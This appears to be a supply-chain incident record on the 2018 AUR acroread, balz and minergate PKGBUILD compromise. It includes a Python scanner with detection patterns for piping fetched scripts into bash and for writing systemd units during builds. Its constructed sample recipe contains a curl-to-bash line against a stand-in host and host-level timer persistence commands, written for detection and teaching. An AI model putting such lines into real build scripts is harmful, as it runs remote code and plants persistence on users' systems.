Open Source · 2018-07-07 · 1 day · Data Exfiltration, Persistence, Remote Code Execution

AUR acroread PKGBUILD ran remote shell scripts

In July 2018, an attacker adopted the orphaned acroread package in the Arch User Repository and added a curl-to-shell install path that fetched remote scripts, installed a systemd timer, and collected host data.

Story

The acroread incident was a small compromise, but it is a clean example of how community package metadata becomes a distribution point. Adobe Reader was not backdoored upstream, and Arch's official binary repositories were not compromised. The poisoned layer was the AUR package recipe that Arch users could pull into a normal local build.

The package was attractive because nobody was actively maintaining it. acroread wrapped an old Linux build of Adobe Reader, a native version no longer supported by Adobe. On July 8, 2018, Arch users noticed that an AUR account named xeactor had adopted the orphaned package and pushed a PKGBUILD change with the classic red flag: a remote script fetched from ptpb.pw and piped into bash.

That first script was not noisy malware. It staged the rest of the intrusion. The script created xeactor.service and xeactor.timer under systemd paths, set the timer to run every 360 seconds, and downloaded a second script from ptpb.pw. The second script collected system details and posted them to Pastebin through an API key. Public analysis did not find a self-update mechanism or a destructive payload, but the installer path had already crossed the important line: a trusted community build recipe was executing attacker-controlled shell code during installation.
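A reviewer-side check for the pattern described above: a PKGBUILD whose build or package step fetches a remote script and pipes it into a shell, or writes systemd units onto the build host rather than into `$pkgdir`. This is an added example, not Arch tooling and not the actual malicious commit; the two sample recipes, the rule names and the `example.invalid`/`paste.invalid` hostnames are constructed for illustration.

```python
"""Static checks for a PKGBUILD: flag remote-fetch-and-execute and host-level
systemd unit creation at build time. Added example; the sample recipes below
are constructed and are not the real acroread PKGBUILD."""
import re

# curl/wget output piped into a shell, e.g.  curl -s URL | bash
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|da|z)?sh\b")
# fetched content executed another way: bash <(curl URL) or eval "$(curl URL)"
EXEC_FETCHED = re.compile(
    r"(\b(ba|da|z)?sh\s+<\(\s*(curl|wget)\b|\beval\b[^\n]*\$\(\s*(curl|wget)\b)"
)
# a systemd unit path; legitimate recipes only write these under $pkgdir
UNIT_PATH = re.compile(r"/(etc|usr/lib|lib)/systemd/system/[^\s'\"]*\.(service|timer)\b")
# a PKGBUILD has no business enabling or starting units on the build host
SYSTEMCTL = re.compile(r"\bsystemctl\s+(enable|start|daemon-reload)\b")


def scan_pkgbuild(text):
    """Return a list of (line_number, rule, line) findings for a PKGBUILD."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # comments and blank lines carry no commands
        if PIPE_TO_SHELL.search(line) or EXEC_FETCHED.search(line):
            findings.append((n, "remote-script-execution", line))
        if UNIT_PATH.search(line) and "$pkgdir" not in line and "${pkgdir}" not in line:
            findings.append((n, "host-systemd-unit-write", line))
        if SYSTEMCTL.search(line):
            findings.append((n, "systemctl-in-build", line))
    return findings


# Constructed clean recipe: installs its own unit file under $pkgdir, which is normal.
SAMPLE_CLEAN = """\
pkgname=examplepkg
pkgver=1.0
pkgrel=1
source=("https://example.invalid/${pkgname}-${pkgver}.tar.gz")

package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  install -Dm644 ${pkgname}.service "$pkgdir/usr/lib/systemd/system/${pkgname}.service"
}
"""

# Constructed suspect recipe showing the three behaviours the checks target.
SAMPLE_SUSPECT = """\
# Constructed sample recipe, not the real acroread PKGBUILD
pkgname=examplepkg
pkgver=1.0
pkgrel=1
source=("https://example.invalid/${pkgname}-${pkgver}.tar.gz")

package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  # shipping a unit file inside the package is normal
  install -Dm644 ${pkgname}.timer "$pkgdir/usr/lib/systemd/system/${pkgname}.timer"
  # these three are not: fetched code runs on the build host, units land on the host
  curl -s https://paste.invalid/stage1 | bash
  cp helper.timer /etc/systemd/system/helper.timer
  systemctl enable --now helper.timer
}
"""

if __name__ == "__main__":
    for name, text in (("clean", SAMPLE_CLEAN), ("suspect", SAMPLE_SUSPECT)):
        print(f"== {name} ==")
        for n, rule, line in scan_pkgbuild(text):
            print(f"line {n}: {rule}: {line}")
```

The `$pkgdir` exemption matters: many legitimate packages ship `.service` and `.timer` files, so the signal is a unit written to an absolute host path (or a `systemctl` call) during build, not the presence of a unit file. Running the check over the PKGBUILD diff before `makepkg` is the point at which the acroread change would have been caught by anyone reading it.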

The response was fast. The report hit the aur-general list at 05:48 UTC on July 8. Six minutes later, Trusted User Eli Schwartz said the account had been suspended and the commit reverted. He then found and fixed two other packages that had been modified the same way. Arch later named the affected versions as acroread 9.5.5-8, balz 1.20-3, and minergate 8.1-2.

The important boundary is scope. AUR is user-produced content and has always carried a review burden for the user. That does not make the incident irrelevant to supply-chain history; it makes the trust lesson more precise. The attacker did not need to compromise Adobe, Arch package signing, or pacman. They needed an abandoned AUR package, a plausible maintainer action, and an install script that too many users would let run without reading.

Affected Artifacts

acroread

aur · aur.archlinux.org · repository · Package Build Script
Observed: 2018-07-07 to 2018-07-08
Compromised Versions: 9.5.5-8 (as named in the Story section above)
Fixed: Not listed
Evidence: distribution: aur.archlinux.org/cgit/aur.git/commit, advisory: lists.archlinux.org/pipermail/aur-general/2018-July/034151.html, commit: b3fec9f2f16703c2dae9e793f75ad6e0d98509bc, account: xeactor, +7 more
  • The AUR cgit link now reports a bad commit reference, but the commit ID is preserved in the Arch aur-general report and contemporaneous coverage.
  • This was an AUR package recipe compromise, not an Adobe Reader upstream compromise and not a compromise of Arch's official binary package repositories.

balz

aur · aur.archlinux.org · repository · Package Build Script
Observed: 2018-07-07 to 2018-07-08
Compromised Versions: 1.20-3 (as named in the Story section above)
Fixed: Not listed
Evidence: advisory: lists.archlinux.org/pipermail/aur-general/2018-July/034153.html, advisory: lists.archlinux.org/pipermail/aur-general/2018-July/034169.html, account: xeactor, observable: Arch Trusted User Eli Schwartz said two other packages had been maliciously modified the same way; Morten Linderud later listed balz 1.20-3 as one affected version.

minergate

aur · aur.archlinux.org · repository · Package Build Script
Observed: 2018-07-07 to 2018-07-08
Compromised Versions: 8.1-2 (as named in the Story section above)
Fixed: Not listed
Evidence: advisory: lists.archlinux.org/pipermail/aur-general/2018-July/034153.html, advisory: lists.archlinux.org/pipermail/aur-general/2018-July/034169.html, account: xeactor, observable: Arch Trusted User Eli Schwartz said two other packages had been maliciously modified the same way; Morten Linderud later listed minergate 8.1-2 as one affected version.

Incident Context

Motive: Data Collection
Attribution: Person
Cause: Orphaned Package Takeover
Transitive: No
Actor: xeactor

External References

Source record: oss/attacks/arch-aur-acroread/meta.yaml